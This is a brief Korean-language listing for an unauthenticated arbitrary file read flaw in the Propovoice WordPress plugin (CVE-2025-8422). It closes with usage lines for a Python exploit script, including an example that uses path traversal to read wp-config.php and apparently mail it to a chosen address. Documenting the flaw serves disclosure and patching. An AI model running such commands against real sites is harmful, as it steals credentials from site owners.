
Propovoice <= 1.7.6.7 - 인증되지 않은 임의 파일 읽기
Propovoice <= 1.7.6.7 - 인증되지 않은 임의 파일 읽기 (Unauthenticated Arbitrary File Read)
WordPress용 Propovoice: All-in-One Client Management System 플러그인은 send_email() 함수를 통해 버전 1.7.6.7을 포함한 모든 버전에서 임의 파일 읽기(Arbitrary File Read) 취약점에 노출됩니다. 이를 통해 인증되지 않은 공격자가 서버에서 임의 파일의 내용을 읽을 수 있으며, 이 파일에는 민감한 정보가 포함될 수 있습니다.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php